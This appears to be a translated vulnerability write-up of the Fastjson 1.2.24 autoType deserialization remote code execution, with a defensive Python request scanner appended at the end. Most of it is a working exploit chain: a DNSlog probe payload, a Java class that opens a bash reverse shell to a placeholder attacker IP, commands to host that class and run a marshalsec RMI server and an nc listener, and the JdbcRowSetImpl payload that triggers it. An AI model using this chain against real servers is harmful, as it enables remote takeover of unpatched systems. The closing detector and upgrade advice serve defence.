0x01 Vulnerability Overview

0x02 Affected Versions

  Fastjson <= 1.2.24

0x03 Reproduction

  fastjson/1.2.24-rce

POC

Change the request method to POST and send the following payload as the body. If the `val` host resolves (a DNS query arrives at the dnslog domain), autoType deserialization is reachable:

  {"naraku":{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}}

EXP

  https://github.com/CaijiOrz/fastjson-1.2.47-RCE

Modify the reverse-shell code in Exploit.java:

  public class Exploit {
      public Exploit() {
          try {
              // Runs when the JNDI reference is resolved and the class is instantiated
              Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/攻击者IP/22255 0>&1");
          } catch (Exception e) {
              e.printStackTrace();
          }
      }

      public static void main(String[] argv) {
          Exploit e = new Exploit();
      }
  }

! Remember to compile the Java file with javac:

  javac Exploit.java

Start a simple web server to serve the compiled class:

  python3 -m http.server 55561

Start an RMI server with marshalsec that references the class served above:

  java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://VPS服务器:55561/#Exploit 55562

Listen for the reverse shell on the attacker host:

  nc -lvnp

Send the request via Burp, pointing `dataSourceName` at the EXP (RMI) server:

  {"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://VPS服务器:55562/Exploit","autoCommit":true}}
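As an added defender-side example (not part of the original writeup or the linked project), the Python below scans request bodies for the two markers both payloads on this page rely on: an `@type` key naming a gadget class, and a string value carrying a JNDI URL that `JdbcRowSetImpl.dataSourceName` would resolve. The sample bodies, the gadget-class list and the function names are constructed for this illustration; the placeholder hosts mirror the page's payloads.

```python
import json
import re

# Constructed sample request bodies (not from the original post). The first two mirror
# the POC and EXP payloads on this page with placeholder hosts; the third is benign;
# the fourth hides the gadget class inside a nested array.
SAMPLE_BODIES = [
    '{"naraku":{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}}',
    '{"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://VPS:55562/Exploit","autoCommit":true}}',
    '{"user":{"name":"alice","roles":["reader"]}}',
    '{"outer":{"items":[{"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:1389/a"}}]}}',
]

# Classes the writeup above abuses through autoType; extend from your own deny policy.
KNOWN_GADGET_TYPES = {
    "com.sun.rowset.JdbcRowSetImpl",
    "java.net.Inet4Address",
    "java.net.Inet6Address",
    "java.net.InetAddress",
}

# JNDI reference schemes that JdbcRowSetImpl.dataSourceName will look up.
JNDI_URL = re.compile(r"^(rmi|ldap|ldaps|iiop)://", re.IGNORECASE)


def walk(node, path="$"):
    """Yield (json_path, key, value) for every key/value pair at any depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            yield child, key, value
            yield from walk(value, child)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from walk(item, f"{path}[{i}]")


def inspect_body(raw):
    """Return a list of (reason, json_path, value) findings; an empty list means clean."""
    try:
        doc = json.loads(raw)
    except json.JSONDecodeError:
        # Fastjson accepts syntax json.loads rejects (single quotes, comments), so do
        # not treat "unparseable" as "safe"; surface it for a lenient secondary check.
        return [("unparseable", "$", None)]
    findings = []
    for path, key, value in walk(doc):
        if key == "@type":
            # The enclosing key name ("naraku", "f") is attacker-chosen and meaningless;
            # only the presence of @type and the class it names matter.
            reason = "autotype-known-gadget" if value in KNOWN_GADGET_TYPES else "autotype"
            findings.append((reason, path, value))
        elif isinstance(value, str) and JNDI_URL.match(value):
            findings.append(("jndi-url", path, value))
    return findings


def flagged_bodies(bodies):
    """Return the indexes of bodies that produced at least one finding."""
    return [i for i, body in enumerate(bodies) if inspect_body(body)]


if __name__ == "__main__":
    for i, body in enumerate(SAMPLE_BODIES):
        print(i, inspect_body(body))
```

The scan deliberately ignores the outer key names, since the attacker picks them freely, and it decodes the JSON before matching so that a `\u0040type` escape is seen as `@type`. Detection of this kind is a backstop only: the fix is upgrading past 1.2.24, and on current Fastjson releases enabling safeMode, which turns autoType off outright.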